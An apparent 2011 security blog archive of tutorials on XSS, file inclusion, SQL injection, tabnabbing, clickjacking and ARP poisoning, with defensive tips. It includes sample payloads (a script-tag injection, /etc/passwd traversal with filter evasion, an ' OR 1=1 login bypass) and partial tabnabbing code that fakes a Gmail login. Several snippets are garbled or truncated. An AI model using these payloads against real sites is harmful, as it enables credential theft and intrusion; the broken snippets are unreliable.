Thursday, December 8, 2011


  • What is XSS ?
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users.

In the previous post I've discussed Persistant (Stored) and Non-persistant (Reflected) XSS, used to hijack the user session. Today I'll discuss how to attack the Web application through Stored Cross-site scripting.

  • Example:
The following is the simple guestbook script where the users can put name and message that will be stored in the guests table of the guestbook database and then displayed.

Script Code:

<h1>Guestbook page:</h1>
<form action='guestbook.php' method='post'>
<p><label for="name">Name:</label><br />
<input type="text" title="Enter your name" name="name" /></p>
<p><label for="message">Your message:</label><br />
<textarea title="Enter your message" name="message"></textarea></p>
<p><label title="Send your message">
<input type="submit" value="Send" /></label></p>

mysql_select_db("guestbook", $con);
mysql_query("INSERT INTO guests VALUES ('','$name','$message')");
$result=mysql_query("SELECT * FROM guests ORDER BY id DESC");
while($row = mysql_fetch_array($result))
echo $row['name'] . " : " . $row['message'];
echo "<hr />";

If I put name as Rajat and message as Hello everybody !!! in the form, it would look like this :

Now a malicious attacker put the following JavaScript snippet as part of the guestbook message which will result an alert box by the browser:

Script Code:

<script>alert("Guestbook page XSSed !!!")</script>

Which means the attacker has been able to insert a script in the application that is later executed in the context of another user.

Moreover the attacker can deface the website by putting the following code which will open a new browser window consisting the defacement page.

Script Code:

<script type="text/javascript">"", "_self");

  • Protection :
1. The script used in the guestbook page is not able to sanitize the inputs, most importantly the control characters like (< , >). That's why instead of displaying those inputs, it is executing them. In order to sanitize the inputs properly we can use the htmlentities() function converts characters to HTML entities as follows:


Now if the attacker put the previous JavaScript, it will be displayed without being executed by the browser like this:

2. Acunetix Web Vulnerability Scanner (WVS) Free Edition offers the functionality for anyone who wants to test their own application for Cross Site Scripting.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Wednesday, November 30, 2011


  • What is Local File Inclusion?
Local File Inclusion (LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.

A typical example of a PHP script vulnerable to LFI is as follows:

$page = $_GET['page'];

A legitimate request made to the script could look like this:

This is of little use to a potential attacker, who is more likely to be interested in the files outside the files/ directory. To do this, an attacker could use LFI. The simplest example would be:

The repeated ../ characters has caused include() to traverse to the root directory, and then include the Unix password file /etc/passwd. Unix /etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.

You may also wish to peruse around in other directories, such as:


  • Poison Null Byte Attacks:
Every now and again, though, the website may output that /etc/passwd/ cannot be found simply because the server is interpreting the location as if it is /etc/passwd.php/. To correct this, we need to apply what is called a Null Byte. This bit of code looks like: %oo (percent double zero). In SQL, it means 0, but everywhere else in coding, it is interpreted similar to a black hole, such as /dev/null/. This code eliminates the use of an extension. The code would appear as /etc/passwd when entered into the address bar.

  • Filter Evasion:
Most good admins will have protected against the simplest LFI attacks, so we should update the example script accordingly.

$page = str_replace('../', '', $_GET['page']);

One way to break this defence is to encode one or more characters into hexadecimal. This works because the browser decodes the input, but PHP does not. Our new LFI would be:

  • Protection:
  1. Process URI requests that do not result in a file request, e.g., executing a hook into user code, before continuing below.
  2. When a URI request for a file/directory is to be made, build a full path to the file/directory if it exists, and normalize all characters (e.g., %20 converted to spaces).
  3. It is assumed that a 'Document Root' fully qualified, normalized, path is known, and this string has a length N. Assume that no files outside this directory can be served.
  4. Ensure that the first N characters of the fully qualified path to the requested file is exactly the same as the 'Document Root'. If so, allow the file to be returned. If not, return an error, since the request is clearly out of bounds from what the web-server should be allowed to serve.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Thursday, November 17, 2011


  • Whai is RFI ?
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.

An attacker can use RFI for:

  • Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.
  • Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, Javascript to steal the client session cookies).

  • Example:
Typically, RFI attacks are performed by setting the value of a request parameter to a URL that refers to a malicious file. Consider the following PHP code:

$page = $_REQUEST["page"];

The first line of code extracts the value of the page parameter from the HTTP request. The second line of code dynamically sets the page name to be included using the extracted value. If the web application does not properly sanitize the value of the page parameter, this code can be exploited.

Consider the following URL:

In this case the included page name will resolve to: 

Thus, the remote file will be included and any malicious code in it will be run by the server. Most popular of them are c99 or r57 shell which allows an attacker to browse the filesystem, upload, view, and edit files as well as move files, delete files, and even change permissions, all as the web server.

  • Prevention:
The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web application. Now we can improve the detection and blocking of such attacks by creating a blacklist of attack sources and a black list of URLs of remotely included malicious scripts:

1. Advanced knowledge of RFI attack sources enables the WAF to block an attack before it even begins.

2. A blacklist of the referenced URL enables the WAF to block exploits targeting zero-day vulnerabilities of applications.

3. The blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...


  • How does the attack begin ?
Attackers follow a fixed methodology to penetrate into a system. The steps a hacker follows can be broadly divided into five phases:

1. Reconnaissance:

Reconnaissance or Footprinting is consideredthe first pre-attack phase and is a systematic attempt to locate, gather, identify, and record information about the target. The hacker seeks to find out as much information as possible about the victim. Some hackers might dumpster dive to find out more about the victim. Dumpster diving is the act of going through the victim's trash. Another favorite of the hacker is social engineering. A social engineer is a person who can smooth talk other individuals into revealing sensitive information. This might be accomplished by calling the help desk and asking someone to reset a password or by sending an email to an insider telling him he needs to reset an account.

2. Scanning:

Scanning and enumeration is considered the second pre-attack phase. Scanning is the active step of attempting to connect to systems to elicit a response. Enumeration is used to gather more in-depth information about the target, such as open shares and user account information. At this step in the methodology, the hacker is moving from passive information gathering to active information gathering. Hackers begin injecting packets into the network and might start using scanning tools such as Nmap. The goal is to map open ports and applications. Unlike the elite blackhat hacker who attempts to remain stealth, script kiddies might even use vulnerability scanners such as Nessus to scan a victim's network.

3. Gaining Access:

As far as potential damage, this could be considered one of the most important steps of an attack. This phase of the attack occurs when the hacker moves from simply probing the network to actually attacking it. After the hacker has gained access, he can begin to move from system to system, spreading his damage as he progresses. Access can be achieved in many different ways. A hacker might find a vulnerability in the web server's software or might perform a denial of service (DOS) on that server. If the hacker is really bold, he might even walk in and tell the receptionist that he is late for a meeting and will wait in the conference room with network access. Pity the poor receptionist who unknowingly provided network access to a malicious hacker.

4. Maintaining Access:

Hackers are diligent at working on ways to maintain access to the systems they have attacked and compromised. They might attempt to pull down the etc/passwd file or steal other passwords so that they can access other user's accounts. Rootkits are one option for hackers. A rootkit is a set of tools used to help the attacker maintain his access to the system and use it for malicious purposes.

5. Clearing Tracks:

Nothing happens in a void, and that includes computer crime. Hackers are much like other criminals in that they would like to be sure to remove all evidence of their activities. Hackers must also be worried about the files or programs they leave on the compromised system. In order that the target company’s security engineer or network administrator cannot detect the evidence of attack, the hacker needs to delete logs files and replace system binaries with Trojans.

  • How do you defend the attack ?
In order to defend a hacker, you have to think from his/her perspective. Being an ethical hacker, you will need to be aware of these tools and techniques to discover their activities and to deploy adequate countermeasures.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Monday, June 13, 2011


Black hat is used to describe a hacker who breaks into a computer system or network with malicious intent. Unlike a white hat hacker, the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose. The black hat hacker may also make the exploit known to other hackers or the public without notifying the victim. The black hats are also called the Crackers.

  • ZombiE_KsA: Founder of PAKbugs-Crew
Jawad Ehsan, a.k.a HAmza, a.k.a ZombiE_KsA is one of the most wanted black hat hackers or cyber criminals, who had founded the He was basically Saudi Arabia based and was charged with 169 website defacements. In the year 2009, he hacked the GOOGLE Moroccoand claimed that was the biggest defacement ever from pakistani hackers.

  • National Response Centre For Cyber Crimes:
NR3C (FIA) is providing single point of contact for all local and foreign organization for all matters related to cyber crimes. It is imparting trainings and related security education to persons of government/semi-government and private sector organizations.

  • 7th January, 2010:
Mr. Aamir Attaa wrote a topic on How to Register Complaint with FIA (Cyber Crime Wing) on a Pakistani Telecom and IT News website.

  • 1st July, 2010:
ZombiE_KsA announced on his website that Federal Investigation Department official website, which he had found on, was owned by Pakbugs.

  • 8th July, 2010:
Pakistani Telecom and IT News website announced that Pakbugs hacker’s group was Arrested, including ZombiE_KsA.

  • Today:
ZombiE_KsA is active on Pakbugs, even more surprisingly he is working for NR3C.

Hope this time FIA/ NR3C is in right, talented hand :) What do you think guys ?

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Thursday, June 9, 2011


  • What is Cyber War?

Today the war between two nations is fought on cyber space where the bullets are replaced by bytes and the soldiers are replaced by hackers. Cyber security experts say that the cyber war between Indian and Pakistani hackers has grown manifold in the last few years.

  • 17th Nov. 2008:
OGRA (Oil and Gas Regulatory Authority, Pakistan) website was defaced by a group of Indian hackers, called HMG (Hindu Militant Guard).

  • 26th Nov, 2008:
In response, a pakistani group of hackers, called PCA (Pakistan Cyber Army) hacked the ONGC (Oil and Natural Gas Corporation Limited, India) website.

In a message posted briefly on the ONGC website, PCA said the hacking was carried out in retaliation for the hacking of the OGRA website.

"Back off, go read some course books, else you will lose both, your name and this game. We will literally smoke your doors off like other groups did before." said the message from PCA.

The fight between Jawad Ehsan/ HAmza/ ZombiE_KsA (founder of PAKBUGS.COM) and r45c4l (leader of Indian Cyber Warriors, ICW, ANDHRAHACKERS.COM) took the higher magnitude.

  • Joint Statement of PCA and ZombiE_KsA:
Joint statement of PCA (Pakistan Cyber Army) and Zombie_ksa (pakbugs crew) comes into friendly terms with ICW (Indian Cyber Warriors, HMG)

After a meeting, all of the three groups agreed not do deface each other’s websites. It all happened when people from these groups realized that there is no use of such defacements and they should be instead involved in constructive work. Apart from that , poor defaced organizations suffer from these activities.

PCA, zombie_ksa and ICW is not responsible for the activities performed by other groups from both countries

Me r45c4l, on the behalf of ICW likes to make a statement that after a series of defacing each other’s government websites, we as well as PCA and PakBugs feels that this is not going to solve any problem and the things will only gets worse. the guys from ICW, PCA and pakBugs are all very talented and instead of harming each other we can help each other to tighten the securities of our sites and servers.

So after a discussion with all ICW,PCA and PakBugs members, we would like to announce that we all quite this here and we will not hack each other’s sites. From now on if any one hacks any sites/servers or claims the hack to be done by either ICW or PCA or PakBugs, we will not be responsible for this.

We all r sorry for the trouble and inconvenience caused by all of us.

With regards,

Team PCA
Team PakBugs
Team ICW

Time passed, but the war did not stop. Some of them are arrested, some are still invisible. The defacements are still in progress. So website administrators, please tune up your security, and make sure that you give tough time to hackers rather than just a minute to deface them.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Monday, April 18, 2011


  • What is Tabnabbing ?

Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular Web sites by impersonating those sites and convincing the user that the site is genuine. The attack's name was coined in early 2010 by Aza Raskin, a security researcher and design expert.

  • How Tabnabbing Works ?

1. A user navigates to your normal looking site.

2. You detect when the page has lost its focus and hasn’t been interacted with for a while.

3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.

4. As the user scans their many open tabs, the favicon and title act as a strong visual cue - memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.

5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

You can make this attack even more effective by changing the copy: Instead of having just a login screen, you can mention that the session has timed out and the user needs to re-authenticate. This happens often on bank websites, which makes them even more susceptible to this kind of attack.

  • Source Code:

var TIMER = null;
var HAS_SWITCHED = false;

window.onblur = function(){
TIMER = setTimeout(changeItUp, 5000);

window.onfocus = function(){
if(TIMER) clearTimeout(TIMER);

function setTitle(text){ document.title = text; }

favicon = {
docHead: document.getElementsByTagName("head")[0],
set: function(url){

addLink: function(iconURL) {
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = iconURL;

removeLinkIfExists: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {

get: function() {
var links = this.docHead.getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var link = links[i];
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
return link.href;

function createShield(){
div = document.createElement("div"); = "fixed"; = 0; = 0; = "white"; = "100%"; = "100%"; = "center"; = "hidden";

img = document.createElement("img"); = "15px";
img.src = "";

var oldTitle = document.title;
var oldFavicon = favicon.get() || "/favicon.ico";

img.onclick = function(){
div.parentNode.removeChild(div); = "auto";


function changeItUp(){
if( HAS_SWITCHED == false ){
setTitle( "Gmail: Email from Google");


  • Protection:

1. Keep your web browser up-to-date. Also make sure that plugins and extensions are up-to-date and from trusted sources.

2. The NoScript extension for Firefox defends both from the JavaScript-based and from the scriptless attack, based on meta refresh, by preventing inactive tabs from changing the location of the page.

3. Pay attention to the address in your browser’s toolbar, especially when it comes to login pages. It’s easy to get into muscle-memory mode and just assume that a tab is unchanged, but for important user accounts, keep an eye on that location bar.

4. Consider using some sort of password management tool. Raskin points to the Firefox Account Manager as one method of using the browser for your identity manager, but plugins and tools like 1Password are good choices too. Rather than typing in user names and passwords individually, using an identity manager that compares the site you are on against the stored data in its database (making sure the addresses and DNS addresses matchup) will prevent you from entering in information into a false site.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...


  • What is Clickjacking ?

Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

Clickjacking involves generating a fake graphical overlay on top of an existing Web page in order to visually change the Web page while preserving its functionality (buttons, forms, etc.). This is done with the intension of misleading users to interact with the hidden Web page while they believe they are interacting with a completely different Web site.

  • Description:

Using only CSS Z-INDEX and HTML IFRAME, an attacker can create a transparent victim web page that contains privileged buttons. Underneath this transparent IFRAME, the attacker puts content, like a game, that entices the user to click. You may think you're playing a game, when you're actually starting a webcam recording.

Sample Script Code:

<div style="z-index:2; position:absolute;top:0; left:0;width: 70%; height:70%">
<iframe src="" id="frame1" style="opacity:0.4;filter:alpha(opacity=40); " width="100%" height="100%" onmouseover=";this.filters.alpha.opacity=50" onmouseout=";this.filters.alpha.opacity=0"/></iframe></div>
<div align="right" style="position:absolute; top:0; left:0; z-index:1; width: 70%;height:70%; background-color: yellow;text-align:left;">
<strong>This is an example of how a simple clickjacking attack is done by a malicious site.</strong><br/></div>


In this example, an attacker carries the clickjacking attack using a technique called IFrame overlays. In this technique, the malicious Web page includes code that generates the fake UI and an IFrame that points to an email application at a different domain. When the two are combined the top-level page covers portions of the IFrame in order expose only the “Yes” button and the user can be easily tricked into deleting all messages in his inbox.


One of the most notorious examples of Clickjacking was an attack against the Adobe Flash plugin settings page. By loading this page into an invisible iframe, an attacker could trick a user into altering the security settings of Flash, giving permission for any Flash animation to utilize the computer's microphone and camera.


ClickJacking is similar to many others scams which attacked Facebook over the years. It attracts users with status like “OMG This Guy Went a Little Too Far with His Revenge on His Ex-Girlfriend”. On clicking the link it asks users to complete a validation test to ensure that the response is not computer. However, by responding users are actually clicking Facebook’s “share” and “like” buttons, while also posting the message to their wall.

  • Protection:

The best defense against ClickJacking attacks is to use Firefox with the NoScript add-on installed.

Default protections that NoScript has provided for a long time, i.e. JavaScript and plugin blocking can prevent most clickjacking attacks. Since version 1.8.2, NoScript provides a new default kind of protection called ClearClick, which defeats clickjacking no matter if you block frames or not .

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...


  • What is ARP ?
The Address Resolution Protocol (ARP) is a computer networking protocol for determining a network host's hardware address (MAC) or link layer when only its Internet Layer (IP) or Network Layer address is known. In fact it’s a IP to MAC mapping.

Broadcast ARP Request:

Jessica, the receptionist, tells Word to print the latest company contact list. This is her first print job today. Her computer (IP address wants to send the print job to the office's HP LaserJet printer (IP address So Jessica's computer broadcasts an ARP Request to the entire local network asking, "Who has the IP address,"

Unicast ARP Reply:

All the devices on the network ignore this ARP Request, except for the HP LaserJet printer. The printer recognizes its own IP in the request and sends an ARP Reply: "Hey, my IP address is Here is my MAC address: 00:90:7F:12:DE:7F"

  • ARP Poisoning:
Address Resolution Protocol (ARP) spoofing, also known as ARP poisoning or ARP Poison Routing (APR), is a technique used to attack an Ethernet wired or wireless network. ARP Spoofing may allow an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop the traffic altogether.

The ability to associate any IP address with any MAC address provides hackers with many attack vectors, including Denial of Service (DoS), Man in the Middle, and MAC Flooding.

  • Man in the Middle Attack (MIMA):
A hacker can exploit ARP Cache Poisoning to intercept network traffic between two devices in your network.

Attack Stage-1:

The hacker wants to see all the traffic between your computer,, and your Internet router, The hacker begins by sending a malicious ARP "reply" (for which there was no previous request) to your router, associating his computer's MAC address with

Attack Stage-2:

Now your router thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to your computer, associating his MAC Address with

Attack Stage-3:

Now your machine thinks the hacker's computer is your router. Finally, the hacker turns on an operating system feature called IP forwarding. This feature enables the hacker's machine to forward any network traffic it receives from your computer to the router.

  • ARP Poisoning Tool:
Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many feature for network and host analysis.

Download ETTERCAP from here.

  • Protection:
1. Arpwatch is a computer software tool for monitoring Address Resolution Protocol traffic on a computer network. Network administrators monitor ARP activity to detect ARP spoofing.

2. Arping is a computer software tool that is used to discover hosts on a computer network. The arping tool is analogous in function to ping, which probes hosts using the Internet Control Message Protocol at the Internet Layer (OSI Layer 3).

3. Capsa Network Analyzer (Packet Sniffer) is an easy-to-use Ethernet network analyzer (aka. packet sniffer or protocol analyzer) for network monitoring and troubleshooting purposes.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Sunday, January 2, 2011


  • What is SQL Injection?
A SQL injection or SQLI attack consists of injection of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database, recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.

A web application is vulnerable to an SQL injection attack if an attacker is able to insert SQL statements into an existing SQL query of the application. This is usually achieved by injecting malicious input into user fields that are used to compose the query.

  • SQLI Example:
Consider a web application that uses a query shown in Step 1 for authenticating its users.

SQL Injection Step 1:

SELECT * FROM Users WHERE User = 'john' AND Password = 'doe'

This query retrieves the ID and LastLogin fields of user john with password doe from table Users. In this example, a login page prompts the user to enter her username and password into a form. When the form is submitted, its fields are used to construct an SQL query shown in Step 2 that authenticates the user.

SQL Injection Step 2:

sqlQuery = "SELECT * FROM Users WHERE User = '$username' AND Password = '$password'"

If the login application does not perform correct input validation of the form fields, the attacker can inject strings into the query that alter its semantics. For example, consider an attacker entering user credentials such as the ones shown in Step 3.

SQL Injection Step 3:

User: ' OR 1=1 --
Password: anything

Using the provided form data, the vulnerable web application constructs a dynamic SQL query for authenticating the user as shown in Step 4.

SQL Injection Step 4:

SELECT * FROM Users WHERE User = '' OR 1=1 -- ' AND Password = 'anything'

The "--" command indicates a comment in Transact-SQL. Hence, everything after the first "--" is ignored by the SQL database engine. With the help of the first quote in the input string, the user name string is closed, while the '' OR 1=1 adds a clause to the query which evaluates to true for every row in the table. When executing this query, the database returns all user rows, which applications often interpret as a valid login.

  • SQLI Helper:
SQLI Helper is handy software to hack website by injecting SQL query to the database.

Download SQLI Helper from here.

  • Protection:
1. Web application developers need to consider malicious input data and sanitize it properly before using it to construct dynamically generated SQL queries.

2. A straight-forward, though error-prone, way to prevent injections is to escape characters that have a special meaning in SQL. In PHP, for example, it is usual to escape parameters using the function mysql_real_escape_string(); before sending the SQL query:

$query = sprintf("SELECT * FROM 'Users' WHERE UserName='%s' AND Password='%s'",

3. Another way of helping developers is to implement user data encoding within the web server application environment. For example, Microsoft implemented such security checks in their .NET framework.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...